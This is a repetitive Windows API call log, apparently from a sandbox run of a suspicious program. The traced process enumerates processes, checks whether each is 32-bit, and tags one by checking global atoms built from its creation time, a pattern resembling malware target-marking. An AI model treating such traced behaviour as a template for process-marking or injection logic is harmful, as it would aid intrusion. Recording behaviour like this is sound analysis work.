	[0104.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.249] CloseHandle (hObject=0x694) returned 1
	[0104.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.249] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.249] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.249] CloseHandle (hObject=0x694) returned 1
	[0104.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.250] CloseHandle (hObject=0x694) returned 1
	[0104.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.250] CloseHandle (hObject=0x694) returned 1
	[0104.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.250] CloseHandle (hObject=0x694) returned 1
	[0104.250] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.250] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.250] CloseHandle (hObject=0x694) returned 1
	[0104.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.251] CloseHandle (hObject=0x694) returned 1
	[0104.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.251] CloseHandle (hObject=0x694) returned 1
	[0104.251] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.251] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.252] CloseHandle (hObject=0x694) returned 1
	[0104.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.252] CloseHandle (hObject=0x694) returned 1
	[0104.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.252] CloseHandle (hObject=0x694) returned 1
	[0104.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.252] CloseHandle (hObject=0x694) returned 1
	[0104.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.252] CloseHandle (hObject=0x694) returned 1
	[0104.252] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.252] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.253] CloseHandle (hObject=0x694) returned 1
	[0104.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.253] CloseHandle (hObject=0x694) returned 1
	[0104.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.253] CloseHandle (hObject=0x694) returned 1
	[0104.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.253] CloseHandle (hObject=0x694) returned 1
	[0104.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.253] CloseHandle (hObject=0x694) returned 1
	[0104.253] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.253] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.254] CloseHandle (hObject=0x694) returned 1
	[0104.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.254] CloseHandle (hObject=0x694) returned 1
	[0104.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.254] CloseHandle (hObject=0x694) returned 1
	[0104.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.254] CloseHandle (hObject=0x694) returned 1
	[0104.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.254] CloseHandle (hObject=0x694) returned 1
	[0104.254] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.254] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.255] CloseHandle (hObject=0x694) returned 1
	[0104.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.255] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.255] CloseHandle (hObject=0x694) returned 1
	[0104.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.255] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.255] CloseHandle (hObject=0x694) returned 1
	[0104.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.255] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.255] CloseHandle (hObject=0x694) returned 1
	[0104.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.255] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.255] CloseHandle (hObject=0x694) returned 1
	[0104.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.255] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.256] CloseHandle (hObject=0x694) returned 1
	[0104.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.256] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.256] CloseHandle (hObject=0x694) returned 1
	[0104.256] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.256] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.256] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.256] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.257] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.257] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.257] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.257] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.257] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.257] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.257] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.258] CloseHandle (hObject=0x694) returned 1
	[0104.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.258] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.258] CloseHandle (hObject=0x694) returned 1
	[0104.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.258] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.258] CloseHandle (hObject=0x694) returned 1
	[0104.258] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.258] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.258] CloseHandle (hObject=0x694) returned 1
	[0104.292] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.293] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.295] CloseHandle (hObject=0x694) returned 1
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.295] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.295] CloseHandle (hObject=0x694) returned 1
	[0104.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.296] CloseHandle (hObject=0x694) returned 1
	[0104.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.296] CloseHandle (hObject=0x694) returned 1
	[0104.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.296] CloseHandle (hObject=0x694) returned 1
	[0104.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.296] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.296] CloseHandle (hObject=0x694) returned 1
	[0104.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.297] CloseHandle (hObject=0x694) returned 1
	[0104.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0104.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.297] CloseHandle (hObject=0x694) returned 1
	[0104.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0104.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0104.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.297] CloseHandle (hObject=0x694) returned 1
	[0104.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0104.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.297] CloseHandle (hObject=0x694) returned 1
	[0104.297] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0104.297] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.297] CloseHandle (hObject=0x694) returned 1
	[0104.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0104.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.298] CloseHandle (hObject=0x694) returned 1
	[0104.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0104.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.298] CloseHandle (hObject=0x694) returned 1
	[0104.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0104.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.298] CloseHandle (hObject=0x694) returned 1
	[0104.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0104.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.298] CloseHandle (hObject=0x694) returned 1
	[0104.298] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0104.298] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.298] CloseHandle (hObject=0x694) returned 1
	[0104.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0104.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.299] CloseHandle (hObject=0x694) returned 1
	[0104.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0104.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.299] CloseHandle (hObject=0x694) returned 1
	[0104.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0104.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.299] CloseHandle (hObject=0x694) returned 1
	[0104.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0104.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.299] CloseHandle (hObject=0x694) returned 1
	[0104.299] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0104.299] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.299] CloseHandle (hObject=0x694) returned 1
	[0104.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0104.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.300] CloseHandle (hObject=0x694) returned 1
	[0104.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0104.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.300] CloseHandle (hObject=0x694) returned 1
	[0104.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0104.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.300] CloseHandle (hObject=0x694) returned 1
	[0104.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0104.300] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.300] CloseHandle (hObject=0x694) returned 1
	[0104.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0104.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.301] CloseHandle (hObject=0x694) returned 1
	[0104.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0104.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.301] CloseHandle (hObject=0x694) returned 1
	[0104.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0104.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.301] CloseHandle (hObject=0x694) returned 1
	[0104.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0104.301] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.301] CloseHandle (hObject=0x694) returned 1
	[0104.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0104.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.302] CloseHandle (hObject=0x694) returned 1
	[0104.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.302] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.302] CloseHandle (hObject=0x694) returned 1
	[0104.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0104.302] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.302] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0104.302] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0104.303] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0104.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.303] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0104.303] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0104.304] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0104.304] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0104.304] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0104.304] CloseHandle (hObject=0x694) returned 1
	[0104.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0104.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0104.304] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.304] CloseHandle (hObject=0x694) returned 1
	[0104.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0104.304] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.304] CloseHandle (hObject=0x694) returned 1
	[0104.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0104.304] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.304] CloseHandle (hObject=0x694) returned 1
	[0104.341] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0104.342] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0104.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0104.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0104.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0104.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0104.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0104.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0104.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0104.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0104.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0104.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0104.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0104.344] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.344] CloseHandle (hObject=0x694) returned 1
	[0104.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0104.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0104.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0104.345] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.345] CloseHandle (hObject=0x694) returned 1
	[0104.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0104.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0104.345] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.345] CloseHandle (hObject=0x694) returned 1
	[0104.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0104.345] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.345] CloseHandle (hObject=0x694) returned 1
	[0104.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0104.346] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.346] CloseHandle (hObject=0x694) returned 1
	[0104.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0104.346] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.346] CloseHandle (hObject=0x694) returned 1
	[0104.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0104.346] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0104.346] CloseHandle (hObject=0x694) returned 1
	[0104.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
